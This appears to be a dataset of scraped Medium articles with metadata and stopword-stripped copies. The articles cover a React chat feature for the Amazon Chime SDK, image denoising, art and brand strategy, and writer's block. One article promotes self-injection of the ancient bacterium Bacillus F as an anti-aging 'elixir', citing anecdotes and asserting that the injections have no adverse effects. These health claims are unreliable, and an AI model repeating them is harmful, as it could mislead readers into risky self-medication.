"outgoing" : "incoming"} senderName={senderName} content={text} showTail={true} css={bubbleStyles} /> </ChatBubbleContainer> ) } return ( <Roster className="roster"> <RosterHeader title="Chat" onClose={()=>{closeChat}}> </RosterHeader> {attendeeItems} <br/> <Textarea //@ts-ignore onChange={e => setChatMessage(e.target.value)} value={chatMessage} placeholder="input your message" type="text" label="" style={{resize:"vertical",}} /> <PrimaryButton label="send" onClick={e=>{ setChatMessage("") sendChatData(chatMessage) // <---- (3) }} /> </Roster> ); } The rest you have to do is enable this ChatView to be displayed from a navibar. The display from the navibar is not essential in this case, and it contains several minor modifications, so I will not describe it. Please check the changes from the repository’s commit log. Run Now, let’s see how it works. If you type a message like this, you’ll see a message on your screen with the other person. For your own message (which has an outgoing variant attribute), it will be a blue speech bubble. For other messages, it will be a white speech bubble. You can toggle the display of the balloon’s tail (which, in cartoon terms, indicates where the balloon originates) by using the tail attribute, but you can’t change its direction. Otherwise, you can omit the time or add action buttons. Repository You can find the source code for this one in the “chat_feature” branch of the following repository You can launch it in the same way as the way we ran the demo in the previous article, so check out how it works. Finally This is a look at adding chat functionality to the official Amazon Chime SDK React Component Library demo. Although I had to touch the raw Amazon Chime SDK a bit, I was able to create a chat GUI that was consistent with the other components without too much effort. In addition to the chat function introduced here, the following repositories provide a version with a whiteboard function. Also, Cognito integration and virtual backgrounds are implemented in the following repositories. Virtual Background Whiteboard
https://medium.com/swlh/add-chat-feature-to-demo-of-amazon-chime-sdk-react-component-library-9379f6e43e58
[]
2020-12-13 06:48:39.032000+00:00
['JavaScript', 'React', 'AWS', 'Videoconference']
Title Add Chat Feature Demo Amazon Chime SDK React Component LibraryContent Add Chat Feature Demo Amazon Chime SDK React Component Library dannadori Follow Nov 30 · 7 min read Note article also available hereJapanese httpscloudflectcojpentry20201130125920 last article posted brief introduction Amazon Chime SDK React Component Library time writing latest update library ver 150 added Chatrelated component I’m going use add Chat functionality official AWS demo Like Note article bit complicated using React coding simply want run code URL repository given end article get code run First time add Chat functionality based demo provided official First make sure working sample ver 150 referring previous article Approach Generally Amazon Chime SDK React Component Library provides React component well hook provider Context APIs work behind component make easier use Amazon Chime’s feature addition Chatrelated component hoping would provide provider hook enable Chat functionality unfortunately haven’t yet issue say implement data message realtime signaling Please refer previous article data message realtime signaling would like implement provider us data message realtime signaling RealitimeSubscribeChatStateProvider name provider create RealtimeSubscribeChatStateProvider following brief description content provider excerpt think important entire source code found Call userealitimeSubscribeChatState provider refer Chat feature data Definition State Define State Chat function data provided userealitimeSubscribeChatState want create simple Chat function following two variable sufficient export interface RealitimeSubscribeChatStateValue chatData RealtimeData sendChatData mess string void RealtimeData used interface actual data sent received article defined following data structure export type RealtimeData uuid string data createdDate number senderName string snip useRealitimeSubscribeChatState method provide State follows creating provider using Context API think it’s almost formulaic won’t describe export const useRealitimeSubscribeChatState RealitimeSubscribeChatStateValue const state useContextRealitimeSubscribeChatStateContext state handle exception return state Definition Provider Sending receiving data message realtime signaling done AudioVideoFacade get reference AudioVideoFacade useAudioVideo 1–1 get username useAppState 1–2 user name retrieved useAppState 1–2 Chat text data managed provider using useState 1–3 2–1 define data transmission function using data message realtime signaling call method audioVideo AudioVideoFacade send data time specify “CHAT” specify topic 2–2 Also since sender can’t receive sent data add sent data Chat text data sending2–3 useEffect register deletes function receiving data message realtime signaling 3–1 3–2 receive function par received data add text data Chat shown 3–3 export const RealitimeSubscribeChatStateProvider child Props const audioVideo useAudioVideo 11 const localUserName useAppState 12 const chatData setChatData useState RealtimeData 13 const sendChatData text string 21 const mess RealtimeData uuid v4 data text createdDate new DategetTime senderName localUserName audioVideorealtimeSendDataMessageCHAT DataMessageType JSONstringifymess 22 setChatDatachatData mess 23 const receiveChatData mess DataMessage 33 const data JSONparsemesstext RealtimeData setChatDatachatData data useEffect audioVideorealtimeSubscribeToReceiveDataMessage 31 CHAT DataMessageType receiveChatData return audioVideorealtimeUnsubscribeFromReceiveDataMessageCHAT DataMessageType 32 const 
providerValue chatData sendChatData return RealitimeSubscribeChatStateContextProvider valueproviderValue child RealitimeSubscribeChatStateContextProvider GUI Next I’m going go part display Chat screen another excerpt think important Adding RealitimeSubscribeStateProvider Modify DOM MeetingView allow created provider used conference room Add realtimeSubscribeStateProvider 1 part allow Chat feature used subordinate Views const MeetingView useMeetingEndRedirect const showNavbar showRoster showChat useNavigation return UserActivityProvider StyledLayout showNavshowNavbar showRostershowRoster showChat RealitimeSubscribeStateProvider 1 StyledContent MeetingMetrics VideoTileGrid classNamevideos noRemoteVideoViewMeetingDetails MeetingControls StyledContent NavigationControl RealitimeSubscribeStateProvider StyledLayout UserActivityProvider ChatView 1 get chat data reference data sending function using userealitimeSubscribeChatState created earlier 2–1 2–2 use Chat component Amazon Chime SDK React Component Library generate display part later 3 call send function chat data const ChatView const localUserName useAppState const closeChat useNavigation const chatData sendChatData useRealitimeSubscribeChatState 1 const chatMessage setChatMessage useState const attendeeItems let c chatData 21 const senderName csenderName const text cdata const time new DateccreatedDatetoLocaleTimeStringjaJP attendeeItemspush ChatBubbleContainer timestamptime keytimesenderName 22 ChatBubble variant localUserName senderName outgoing incoming senderNamesenderName contenttext showTailtrue cssbubbleStyles ChatBubbleContainer return Roster classNameroster RosterHeader titleChat onClosecloseChat RosterHeader attendeeItems br Textarea tsignore onChangee setChatMessageetargetvalue valuechatMessage placeholderinput message typetext label styleresizevertical PrimaryButton labelsend onClicke setChatMessage sendChatDatachatMessage 3 Roster rest enable ChatView displayed navibar display navibar essential case contains several minor modification describe Please check change repository’s commit log Run let’s see work type message like you’ll see message screen person message outgoing variant attribute blue speech bubble message white speech bubble toggle display balloon’s tail cartoon term indicates balloon originates using tail attribute can’t change direction Otherwise omit time add action button Repository find source code one “chatfeature” branch following repository launch way way ran demo previous article check work Finally look adding chat functionality official Amazon Chime SDK React Component Library demo Although touch raw Amazon Chime SDK bit able create chat GUI consistent component without much effort addition chat function introduced following repository provide version whiteboard function Also Cognito integration virtual background implemented following repository Virtual Background WhiteboardTags JavaScript React AWS Videoconference
3,890
The 3.5 Million-Year-Old Bacteria That Could Be the Answer to Eternal Life
The 3.5 Million-Year-Old Bacteria That Could Be the Answer to Eternal Life Are we meant to live eternally? Ancient bacteria from 3.5 million years ago also known as Bacillus F strain (Source: MIMS) For centuries, humans have been on the lookout for a source of eternity, a potion that can bring you back to your youth. Many legends and stories from ancient history, most probably inspired by witches, hint at the possibility of becoming younger. In our philosophy, we see aging and dying as a natural phenomenon that is meant to be the way it is. However, some people are simply thirsty for eternal life. So much so that they would even risk injecting themselves with this bacteria. In the 21st century, there have been two recorded cases of people injecting themselves with this bacteria and claiming that they feel younger and healthier. But before we go into these cases, we must have a look at what this bacteria actually is, as well as its believed origin. Bacillus F This bacteria, known as Bacillus F, was discovered in 2009 by researchers at Mammoth Mountain in the northern Siberian region of Yakutsk. From the analyses done by the University of Moscow, the bacteria seems to originate from around 3.5 million years ago, around when mammoths were alive. The bacteria has been closely studied, and from the reading of its DNA, it seemed to have the potential of giving the injected organism a longer life and an increase in fertility. The first organisms to be tested with the bacteria were mice. The results were quite clear: all the mice that had been injected with the bacteria showed a longer lifespan. What is even more interesting is that the mice were also still fertile at a very old age. Epidemiologist Viktor Chernyavsky, who took part in the study, mentioned that the bacteria gives out biologically active substances throughout its long life cycle, for as long as the host organism keeps it alive. As an expert, Chernyavsky confirmed that the bacteria did give the mice longevity as well as enhanced fertility. The first person to be injected with the bacteria Even though the tests showed that the bacteria does not harm mice, it was still considered dangerous to introduce it into a human organism, at least until more research was done. However, someone became impatient and wanted to know if this really was the "elixir of life," as it was nicknamed by some of the scientists in the field. Anatoli Brouchkov (Source: Vice) Anatoli Brouchkov was from the department of geocryology, the department which focuses on the study of glacier regions and permanently frozen ground. The scientist wanted to know the truth about the bacteria so badly that he injected himself with it, with no permission from his higher-ups. Brouchkov knew that the bacteria wasn't going to harm him, as it can be found in the water of the Siberian region where it was extracted. This region has some secluded villages whose people have gathered and consumed the same water, teeming with the bacteria, for years without it causing them any harm. In an interview with Jordan Pearson from VICE, Brouchkov mentioned that the bacteria never affected him in a negative way, only positive. He wasn't getting younger in physical appearance, but he was feeling less tired, as if he were younger and much healthier. 
We all know that with age, it is common to not only get tired much quicker but also get sick more often. Besides all this, the most interesting claim that Brouchkov made was that he hadn't suffered from any sort of sickness or illness for more than two years since injecting himself with the bacteria. Although this bacterium is quite primitive for its age, its biological mechanism is extremely complex, making it very difficult for scientists, even with state-of-the-art technology, to understand the way it affects the organism it inhabits. Brouchkov ended his media appearance by stating that he truly believes the Bacillus F bacteria is the key to immortality. Besides this bacteria, there are many others that have been in a state of permafrost for hundreds of thousands of years with remarkable complexity. Many scientists regard these bacteria as a cause of our ancestors' strong immune systems and long lifespans. Another person taking the "elixir of youth" A more recent case was recorded in 2017 by a German actress known as Manoush. The only difference in this case is that Manoush took more doses over a period of three months. Since 2015, the research team from the University of Moscow has been able to unlock the DNA code of the bacteria, gaining even more information on its life-extending abilities, but also confirming that the bacteria can live forever. Photo of Manoush and injection with the bacteria, 2017 (Source: Daily Mail) She claims that since taking the injections she has not only felt younger but is getting younger from a physical perspective. The idea of getting younger physically is a bit more difficult to believe in her case, due to all the plastic surgeries she had undergone in the previous years, but there is still a possibility from a scientific point of view. The actress also mentioned that her skin feels much softer, and, most importantly, that she used to get hay fever every year (something common in many people); since taking the bacteria she hasn't had hay fever anymore, and in fact no type of illness or sickness, just like in Brouchkov's case. Scientists asked for blood samples from her every month during the three-month period she injected herself with the bacteria. She has the desire to live to the age of 100 in a "fully functional body." As there are no adverse effects from the injections with Bacillus F, she continues taking the bacteria.
https://medium.com/history-of-yesterday/the-3-5-million-year-old-bacteria-that-could-be-the-answer-to-eternal-life-a98e7c693759
['Andrei Tapalaga']
2020-12-25 21:02:41.238000+00:00
['Health', 'History', 'Science', 'Life', 'Medicine']
Title 35 MillionYearOld Bacteria Could Answer Eternal LifeContent 35 MillionYearOld Bacteria Could Answer Eternal Life meant live eternally Ancient bacteria 35 million year ago also known Bacillus F strain Source MIMS century human look source eternity potion bring back youth Many legend story ancient history probably inspired witch show possibility becoming younger philosophy see aging dying natural phenomenon meant way However people simply thirsty eternal life much would even risk injecting bacteria 21st century two recorded case people injecting bacteria well claiming feeling younger healthier go case must look bacteria actually present well it’s believed origin Bacillus F bacteria known Bacillus F discovered 2009 researcher Mammoth Mountain northern Siberian region Yakutsk analysis done University Moscow bacteria seems originate around 35 million year ago around mammoth alive bacteria closely studied read DNA presented seemed potential giving injected organism longevity life increase fertility first organism tested bacteria couple mouse result quite clear mouse injected bacteria presented longer lifespan even interesting mouse also still fertile old age Epidemiologist Viktor Chernyavsky took part study mentioned bacteria give biologically active substance long life cycle long organism keep alive expert Chernyavsky positively confirmed bacteria give longevity within mouse well enhanced fertility within mouse tested first person injected bacteria Even test showed bacteria harm mouse organism still considered dangerous introduced human organism least research done However someone became impatient wanted know “elixir life” nicknamed scientist within field Anatoli Brouchkov Source Vice Anatoli Brouchkov department geocryology department focus study glacier region region permanently frozen scientist wanted know truth bacteria bad injected bacteria permission higherups Brouchkov knew bacteria wasn’t going harm found water extracted Siberia region secluded village people gathered consumed water infested bacteria year without causing harm interview Jordan Pearson VICE Brouchkov mentioned bacteria never affected negative way positive mentioned wasn’t getting younger physical appearance feeling le tired younger much healthier know age common get tired much quicker also get sick often Besides interesting claim Brouchkov made didn’t suffer sort sickness illness two year since injecting bacteria Besides virus quite primitive age biological mechanism extremely complex making difficult scientist even state art technology understand way affect organism inhabits Brouchkov ended medium appearance stating truly believe Bacillus F bacteria key immortality Besides bacteria many others state permafrost hundred thousand year remarkable complexity Many scientist define bacteria cause ancestor’s great immune system long lifespan Another person taking “elixir youth” recent case recorded 2017 German actress know Manoush difference case Manoush took dos period three month Since 2015 research team University Moscow able unlock DNA code bacteria gaining even information eternal ability also confirming bacteria live forever Photo Manoush injection bacteria 2017 Source Daily Mail claim since taking vaccine felt younger getting younger physical perspective Although idea getting younger physical perspective bit difficult believe case due plastic surgery undergone previous year still possibility scientific point view actress also mentioned skin feel much softer important fact would get hay fever every year something 
common many people Since taking bacteria didn’t hayfever anymore fact type illness sickness like Brouchkov’s case Scientists asked blood sample every month three month period injected bacteria desire living age 100 “fully functional body” adverse effect injection Bacillus F continues taking bacteriaTags Health History Science Life Medicine
3,891
Denoising Noisy Documents
Numerous scientific papers, historical documents and artifacts, recipes, and books are stored on paper, whether handwritten or typewritten. With time, these papers and notes tend to accumulate noise and dirt: fingerprints, weakening paper fibers, coffee or tea stains, abrasions, wrinkling, and so on. There are several surface cleaning methods used for both preservation and cleaning, but they have certain limits, the major one being that the original document might get altered during the process. I, along with Michael Lally and Kartikeya Shukla, worked on the noisy documents from the UC Irvine NoisyOffice Data Set. Denoising dirty documents enables the creation of higher-fidelity digital recreations of original documents. Several methods for denoising documents (Median Filtering, Edge Detection, Dilation & Erosion, Adaptive Filtering, Autoencoding, and Linear Regression) are applied to a test dataset and their results are evaluated, discussed, and compared. Median Filtering Median filtering is the simplest denoising technique, and it follows two basic steps: first, obtain the "background" of an image using a median filter with a kernel size of 23 x 23, then subtract the background from the image. Only the "foreground" remains, clear of any noise that existed in the background. In this context, the "foreground" is the text or significant details of the document, and the "background" is everything else: the white space between document elements and the noise that collects there.
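As a rough illustration of the two-step median-filtering approach described above, here is a short Python/OpenCV sketch (the file names are placeholders, and the final min-max normalization is just one reasonable way to rescale the result):

# Sketch of background subtraction via median filtering, assuming a grayscale scan.
import cv2
import numpy as np

img = cv2.imread("noisy_page.png", cv2.IMREAD_GRAYSCALE)

# Step 1: estimate the "background" (stains, shading, creases) with a large
# median filter; cv2.medianBlur needs an 8-bit image and an odd kernel size.
background = cv2.medianBlur(img, 23)

# Step 2: subtract the background from the image so that mostly the text
# remains, then rescale to the displayable 0-255 range.
diff = img.astype(np.float32) - background.astype(np.float32)
foreground = cv2.normalize(diff, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8)

cv2.imwrite("denoised_page.png", foreground)

The large 23 x 23 kernel matters here: it has to be wide enough that thin text strokes are ignored and only the slowly varying stains and shading survive as "background."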
https://towardsdatascience.com/denoising-noisy-documents-6807c34730c4
['Chinmay Wyawahare']
2020-07-01 06:10:04.068000+00:00
['Machine Learning', 'Computer Vision', 'Data Science', 'Neural Networks', 'AWS']
Title Denoising Noisy DocumentsContent Numerous scientific paper historical documentariesartifacts recipe book stored paper handwrittentypewritten time papernotes tend accumulate noisedirt fingerprint weakening paper fiber dirt coffeetea stain abrasion wrinkling etc several surface cleaning method used preserving cleaning certain limit major one original document might get altered process along Michael Lally Kartikeya Shukla worked data set noisy document UC Irvine NoisyOffice Data Set Denoising dirty document enables creation higher fidelity digital recreation original document Several method denoising document like — Median Filtering Edge Detection Dilation Erosion Adaptive Filtering Autoencoding Linear Regression applied test dataset result evaluated discussed compared Median Filtering Median filtering simplest denoising technique follows two basic step first obtain “background” image using Median Filtering kernel size 23 x 23 subtract background image “foreground” remain clear noise existed background context “foreground” text significant detail document “background” noise white space document elementsTags Machine Learning Computer Vision Data Science Neural Networks AWS
3,892
Questioning Things
I’ve long been a fan of the artist Grayson Perry. In my opinion he speaks a lot of sense, and has a great ability to make art seem more accessible. But I’ve gained even more of an appreciation recently. Mainly because I finally got round to reading his book — ‘Playing to the Gallery’. In it he debunks a lot of myths about the art world, what counts as art, and ways to view it. He also talks about the role of the contemporary artist. And in doing so there’s one thing which really stuck in my mind. He said; “my job is to notice things that other people don’t notice” It likely struck a chord, because ‘noticing things’ is an inherent character trait of strategists. So, it kind of goes with the territory. But it’s also because it highlighted one of the big reasons why I’m drawn to certain artworks over others. And that’s because of the artist’s ability to successfully notice, reframe and reflect the cultural psyche in a way that’s easy to understand and relate to, and, at best, completely change the way that you see something. So while noticing things is one thing, a large part of how impactful a piece of work is in how well it effectively communicates these otherwise ‘unnoticed’ things. How much it challenges, questions and reframes existing ideas. And importantly how much it resonates. This is as true of art, as it is of any kind of visual communications. But noticing, and communicating the most useful or relevant insight, or idea is easier said than done. It’s also somewhat of a strategist’s holy grail. So this got me thinking. How do artists notice things? And what, if anything, can we can learn from that? Noticing starts by asking interesting questions. And art is a great lesson in how to ask. As Ai Weiwei said: “I always think art is a tool to set up new questions. To create a basic structure which can be open to possibilities is the most interesting part of my work…” The ability to ask questions is one of the great powers of art. Both in terms of output (the idea or assumption the artist is questioning with their work) but also in terms of input (what kinds of questions they ask in the first place, and what possibilities it opens up). Asking a good question can make the difference between a great work and a flop. A mediocre piece, and a piece which stops you in your tracks. A piece which invites new conversation, and lays the path for things to come. The ability to ask questions is also a key part of a strategist’s toolbox — from questioning the brief (‘what problem are we trying to solve?’) to interviewing stakeholders and audiences to questioning the usefulness of an insight or idea. So, I started to look at how art asks questions, to see how that could help me in my day-to-day role. And in doing so I found three distinct themes that consistently crop up: Question what you see Question how you see Question what isn’t being seen Three powerful questions to ask when approaching any new challenge or client brief. Let’s unpack that a bit further. In order to ‘notice’ the interesting things, the ‘things that others don’t notice’, it’s important to look beyond the obvious. To forget what you know, and look at things through a fresh lens. To question what you see. Artists are masters of this. They constantly challenge themselves and their audience to forget their assumptions. Deliberately playing with perceptions of reality, to reframe the way that something is seen. The work of conceptual artist Joseph Kosuth is a prime example of this. 
He often commented on the gap between language, image and meaning in his work. ‘One and Three Chairs’, for example, simultaneously showcases a physical chair, a photograph of a chair and a written definition of a chair. On the surface all three chairs represent the same idea (the chair), yet are not the same at all. It’s a great lesson in not taking things at face value. And by stating the ‘obvious’ he successfully create the kind of ‘aha’ moment that leaves a lasting impression. When it comes to strategy, stopping to question what you see is key. Asking for example — What is the real question in the clients brief? What’s the real problem we’re trying to solve? and is what people say really what they mean? But it’s equally useful to question how you see. As Kosuth’s work shows — it’s important to be aware of our own filtering process (i.e. how we instinctively see things). But it’s also important to be aware of the filtering process which is happening all around us. So while Kosuth draws attention to the nuances of interpretation and assumption, he equally questions how something is represented impacts how it is seen. In part, this comes down to context. In art, as in marketing, context is critical. The format, time and surroundings through which an idea is delivered can completely shift its meaning, impact and relevance. So it’s pretty useful to consider when thinking about how to communicate the story that needs to be told. Christian Marclay’s mesmerising and award winning video piece ‘The Clock’ highlighted this all too well. Excerpt from ‘The Clock’ via YouTube In it he stitched together thousands of video clips of clocks, from film and TV history, and played them out in real-time over 24 hours. Taking the clips in isolation, he makes tiny ‘unnoticed’ moments the centrepiece. And by editing out complexity completely shifts the narrative. Making you consider the films, and the concept of time in a whole new way. As Paul Klee said — “Art does not reproduce the visible; rather, it makes visible”. And Marclay’s piece does a brilliant job of doing just that. So, finally, and importantly, as Klee reminds us - question what isn’t being seen. One of the great roles of art is to unlock, comment and shape culture. A lot of the time this involves, not just questioning what is in plain sight, but what is hidden from view. The Guerrilla Girls offer just one example of this. Coined ‘the conscience of the art world’ they are a group of anonymous feminist activist artists that “wear gorilla masks in public and use facts, humor and outrageous visuals to expose gender and ethnic bias as well as corruption in politics, art, film and pop culture”. As they say, “… we undermine the idea of a mainstream narrative by revealing the understory, the subtext, the overlooked, and the downright unfair”. Guerrilla Girls Images and Posters 1985–2018 via YouTube Questioning what isn’t seen, or noticed, is the core theme of their work. But it’s also one which has the power to create real cultural change. Seeping into mainstream culture, since 1985 they have tirelessly campaigned for change. Inspiring countless activist-artists and fans as they go. Questioning what isn’t being seen, or said, and making it visible is at the heart of any truly insightful piece of work. But when it comes down to it a lot of the most powerful work has an authenticity to it that’s truly relatable, meaningful, and memorable. It comes from expressing a central belief that is true to who the artist is. 
And creating a genuine connection with the person who’s viewing it. And when they ask the right questions they have the power to capture attention, shift perceptions, and, ultimately drive behavioural change. When it comes to working out the most useful way forward for brands, there’s something that can be learnt from that. Question what you see, Question how you see it, but importantly, Question what isn’t being seen. Often that’s where the most important messages lie.
https://medium.com/a-strategists-guide-to-art/questioning-things-b7aba5253828
['Harriet Kindleysides']
2020-11-12 10:13:58.308000+00:00
['Brand Strategy', 'Marketing', 'Strategy', 'Creativity', 'Art']
Title Questioning ThingsContent I’ve long fan artist Grayson Perry opinion speaks lot sense great ability make art seem accessible I’ve gained even appreciation recently Mainly finally got round reading book — ‘Playing Gallery’ debunks lot myth art world count art way view also talk role contemporary artist there’s one thing really stuck mind said “my job notice thing people don’t notice” likely struck chord ‘noticing things’ inherent character trait strategist kind go territory it’s also highlighted one big reason I’m drawn certain artwork others that’s artist’s ability successfully notice reframe reflect cultural psyche way that’s easy understand relate best completely change way see something noticing thing one thing large part impactful piece work well effectively communicates otherwise ‘unnoticed’ thing much challenge question reframes existing idea importantly much resonates true art kind visual communication noticing communicating useful relevant insight idea easier said done It’s also somewhat strategist’s holy grail got thinking artist notice thing anything learn Noticing start asking interesting question art great lesson ask Ai Weiwei said “I always think art tool set new question create basic structure open possibility interesting part work…” ability ask question one great power art term output idea assumption artist questioning work also term input kind question ask first place possibility open Asking good question make difference great work flop mediocre piece piece stop track piece invite new conversation lay path thing come ability ask question also key part strategist’s toolbox — questioning brief ‘what problem trying solve’ interviewing stakeholder audience questioning usefulness insight idea started look art asks question see could help daytoday role found three distinct theme consistently crop Question see Question see Question isn’t seen Three powerful question ask approaching new challenge client brief Let’s unpack bit order ‘notice’ interesting thing ‘things others don’t notice’ it’s important look beyond obvious forget know look thing fresh lens question see Artists master constantly challenge audience forget assumption Deliberately playing perception reality reframe way something seen work conceptual artist Joseph Kosuth prime example often commented gap language image meaning work ‘One Three Chairs’ example simultaneously showcase physical chair photograph chair written definition chair surface three chair represent idea chair yet It’s great lesson taking thing face value stating ‘obvious’ successfully create kind ‘aha’ moment leaf lasting impression come strategy stopping question see key Asking example — real question client brief What’s real problem we’re trying solve people say really mean it’s equally useful question see Kosuth’s work show — it’s important aware filtering process ie instinctively see thing it’s also important aware filtering process happening around u Kosuth draw attention nuance interpretation assumption equally question something represented impact seen part come context art marketing context critical format time surroundings idea delivered completely shift meaning impact relevance it’s pretty useful consider thinking communicate story need told Christian Marclay’s mesmerising award winning video piece ‘The Clock’ highlighted well Excerpt ‘The Clock’ via YouTube stitched together thousand video clip clock film TV history played realtime 24 hour Taking clip isolation make tiny ‘unnoticed’ moment centrepiece editing complexity completely shift 
narrative Making consider film concept time whole new way Paul Klee said — “Art reproduce visible rather make visible” Marclay’s piece brilliant job finally importantly Klee reminds u question isn’t seen One great role art unlock comment shape culture lot time involves questioning plain sight hidden view Guerrilla Girls offer one example Coined ‘the conscience art world’ group anonymous feminist activist artist “wear gorilla mask public use fact humor outrageous visuals expose gender ethnic bias well corruption politics art film pop culture” say “… undermine idea mainstream narrative revealing understory subtext overlooked downright unfair” Guerrilla Girls Images Posters 1985–2018 via YouTube Questioning isn’t seen noticed core theme work it’s also one power create real cultural change Seeping mainstream culture since 1985 tirelessly campaigned change Inspiring countless activistartists fan go Questioning isn’t seen said making visible heart truly insightful piece work come lot powerful work authenticity that’s truly relatable meaningful memorable come expressing central belief true artist creating genuine connection person who’s viewing ask right question power capture attention shift perception ultimately drive behavioural change come working useful way forward brand there’s something learnt Question see Question see importantly Question isn’t seen Often that’s important message lieTags Brand Strategy Marketing Strategy Creativity Art
3,893
5 Better Things to Do Instead of Staring at a Blank Page
Photo by Alessio Lin on Unsplash 5 Better Things to Do Instead of Staring at a Blank Page When you’re stuck, take a break. Every writer feels stuck every once in a while. The words don’t seem to come up, and the few that do simply do not fit together. Your thoughts are either muddled or non-existent. Yet, you persist. You stare at the blank page, commanding your brain to come up with something, but it’s useless. Writing is something that’s just not happening for you today, and forcing it might actually make your writer’s block worse. Here are 5 better things for you to do than insist on staring at that blank page: Go for a walk Walking is an effective way to relieve stress and boost creativity. Charles Dickens and Jane Austen are only a few of many writers known to have enjoyed long walks on a frequent basis. There’s something about the repetitive, rhythmic movements of walking that induces a meditative state. Recently, many authors’ instinctive preference for walking to induce creative output has been verified by science. Stanford researchers have found that “a person’s creative output increased by an average of 60 percent when walking.” (Source) A 60% increase in creative output is nothing to sneeze at. Going for a walk offers the added advantage of taking your eyes off the screen for a few minutes. It forces you to take a look at the world around you, and that alone might offer you the breakthrough you’ve been hoping for. Exercise While walking is a form of exercise, you can go one step further and do a more intense workout, such as running, biking, swimming, or weightlifting. Exercising offers many benefits in improving cognitive function, not to mention your overall health. For me, an intense workout is the best form of meditation. While I can still “write in my head” while walking, when I go on a run my mind actually clears of all thought for a few minutes, and that creates the right mindset for welcoming new ideas. Post exercise, there’s a blissful exhaustion that makes me feel completely renewed and ready for another writing session. Talk to a friend Talking to a friend forces you to get out of your own head for a few minutes. It’s easy to mistake isolating yourself for fostering a creativity-friendly environment. While writing is indeed a lonely occupation, sometimes breaking out of isolation is exactly what you need to get out of a creative rut. Talking to a friend brings you a new perspective about life. It reminds you that your blank page with its blinking cursor is not all that matters in the world. There are people out there who have other problems, other projects, other sources of joy. Reminding yourself of that every once in a while shifts your perspective and unlocks new ideas. Getting in touch with someone else’s reality helps you understand how you’ve blown your own creative rut out of proportion by focusing on it exclusively. Play — by yourself, with your kid, or with your pet “Play brings joy. And it’s vital for problem solving, creativity and relationships.” — Margarita Tartakovsky, M.S. We tend to think of play as only for children, but the reality is that adults benefit from play just as much. If you’re playing by yourself or with friends, try to pick something that doesn’t involve the use of screens, to give yourself a break from that. If you’re a parent, enjoy the opportunity to play with your kid. Children are not familiar with all the rules of the world yet, so they are less burdened by constraints on creativity.
Ever seen a child paint a picture in which the grass is pink and the dog, green? Sure, grass isn’t pink in the “real world,” but why can’t the grass be pink and the dog green in her world? When you get immersed in play with children, you begin to see things from an entirely new perspective. You become aware of your own arbitrary rules, and start to ask yourself: why can’t things be different? If you’re not a parent yourself, play with a niece, a young cousin, or your friend’s kids (with permission and parental supervision, of course), or play with your pets. Pets are not the same as children, but you’d be surprised at all the creative ways cats and dogs play when you give them the freedom to be creative. My dog is always surprising me with how she chooses to play with her toys — and with the stuff she thinks of as her toys (like my socks, or the toilet brush). If you don’t have a pet, you can ask a friend to let you play with theirs — most pet owners would appreciate the extra hand (I know I would), and there are plenty of animal shelters that allow volunteers to spend time playing with the animals. (Side note: always be careful letting children and animals play together. Make sure you know both the child and the animal well, and be careful to prevent any accidents. Your dog biting the neighbor’s kid is not going to be the outcome you want.) Cook Cooking is an excellent option to get your eyes off a screen and your hands into something tangible. As you focus on following a recipe, on measuring and preparing the right ingredients, on minding the stove and the oven so you don’t burn your food to a crisp, you’ll find that your mind contemplates ideas in the background, much like when walking or meditating. It doesn’t matter how skilled you are; you can always find a recipe that’s right at your level. Besides, part of the fun of cooking is improving your skills and trying new things. If you’re a beginner, don’t put too much pressure on yourself to make something perfect: allow yourself to make mistakes. Embrace messing up as part of the process. When you’re stuck, get your mind out of writing Many writers mistakenly believe there’s only one solution to writer’s block, which is to push through, or to seek inspiration in writing-related activities, such as doing writing exercises or reading, but that’s not exactly true. In writing, there’s a time to push through, and there’s a time to step away. With practice, you can easily identify the difference between these two moments. If you suspect you’re stuck beyond the point where pushing through can help, step away from the computer. Turn your brain off “writing mode,” release it to think of other things — or to simply not think at all. You’ll be surprised at what your brain can come up with after taking a break like that.
https://medium.com/a-life-of-words/5-better-things-to-do-instead-of-staring-at-a-blank-page-d1c4edf75ece
['Renata Gomes']
2020-07-15 21:01:44.645000+00:00
['Self', 'Writing Tips', 'Creativity', 'Writing', 'Self Improvement']
Title 5 Better Things Instead Staring Blank PageContent Photo Alessio Linon Unsplash 5 Better Things Instead Staring Blank Page you’re stuck take break Every writer feel stuck every word don’t seem come simply fit together thought either muddled nonexistent Yet persist stare blank page commanding brain come something it’s useless Writing something that’s happening today forcing might actually make writer’s block worse Here’s 5 better thing insist staring blank page Go walk Walking effective way relieve stress boost creativity Charles Dickens Jane Austen many writer known enjoyed long walk frequent basis There’s something repetitive rhythmic movement walking induces meditative state Recently many authors’ instinctive preference walking induce creative output veryfied science Stanford researcher found “a person’s creative output increased average 60 percent walking” Source 60 increase creative output nothing sneeze Going walk offer added advantage taking eye screen minute force take look world around alone might offer breakthrough you’ve hoping Exercise walking form exercise go one step intense workout running biking swimming weightlifting Exercising offer many benefit improving cognitive function mention overall health intense workout best form meditation still “write head” walking go run mind actually clear thought minute creates right mindset welcoming new idea Post exercise there’s blissful exhaustion make feel completely renewed ready another writing session Talk friend Talking friend force get head minute It’s easy mistake isolating fostering creativityfriendly environment writing indeed lonely occupation sometimes breaking isolation exactly need get creative rut Talking friend brings new perspective life reminds blank page blinking cursor matter world people problem project source joy Reminding every shift perspective unlocks new idea Getting touch someone else’s reality help understand you’ve blown creative rut proportion focusing exclusively Play — kid pet “Play brings joy it’s vital problem solving creativity relationships” — Margarita Tartakovsky MS tend think play child reality adult benefit play much you’re playing friend try pick something doesn’t involve use screen give break you’re parent enjoy opportunity play kid Children familiar rule world yet le burdened constraint creativity Ever seen child paint picture grass pink dog green Sure grass isn’t pink “real world “ can’t grass pink dog green world get immersed play child begin see thing entirely new perspective become aware arbitrary rule start question can’t thing different you’re parent play niece young cousin friend’s kid permission parental supervision course play pet Pets child you’d surprised creative way cat dog play give freedom creative dog always surprising choses play toy — stuff think toy like sock toilet brush don’t pet ask friend let play theirs— pet owner would appreciate extra hand know would plenty animal shelter allow volunteer spend time playing animal Side note always careful letting child animal play together Make sure know child animal well careful prevent accident dog biting neighbor’s kid going outcome want Cook Cooking excellent option get eye screen hand something tangible focus following recipe measuring preparing right ingredient minding stove oven don’t burn food crisp you’ll find mind contemplates idea background much like walking meditating doesn’t matter skilled always find recipe that’s right level besides part fun cooking improving skill trying new thing you’re beginner don’t put much 
